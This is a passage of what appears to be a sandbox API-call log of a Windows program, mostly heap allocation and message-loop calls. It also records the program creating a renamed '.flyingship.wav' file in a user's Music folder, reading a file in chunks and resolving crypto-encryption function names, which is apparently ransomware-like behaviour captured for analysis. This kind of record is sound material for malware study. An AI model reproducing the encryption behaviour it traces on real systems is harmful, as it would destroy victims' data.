0x9c26a8 [0182.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0182.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0182.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0182.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0182.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.089] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0182.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0182.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0182.089] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0182.089] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0182.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0182.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0182.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0182.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0182.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0182.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0182.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0182.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0182.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0182.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0182.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0182.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0182.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0182.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0182.091] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj")) returned 0x10 [0182.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0182.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0182.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0182.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0182.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0182.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0182.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0182.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0182.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\r64i-tkxh1f.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0182.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0182.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0182.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0182.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0182.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0182.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0182.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0182.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.092] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0182.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0182.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0182.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0182.093] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0182.093] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0182.093] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0182.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0182.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0182.094] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0182.094] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0182.097] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x8a5d, lpOverlapped=0x0) returned 1 [0182.098] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0182.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0182.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18a5d) returned 0xbea018 [0182.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0182.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0182.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0182.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0182.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0182.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18a5d) returned 0xa5f008 [0182.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0182.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.101] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0182.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0182.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0182.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0182.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18a5d) returned 0xbea018 [0182.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0182.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0182.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0182.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0182.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.102] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0182.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0182.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0182.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0182.102] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0182.102] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0182.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0182.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18a5d) returned 0xbea018 [0182.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0182.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0182.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0182.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18a5d) returned 0xa77a70 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0182.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0182.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0182.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0182.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0182.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0182.105] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0182.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0182.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0182.105] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0182.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0182.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28c8 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0182.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0182.105] 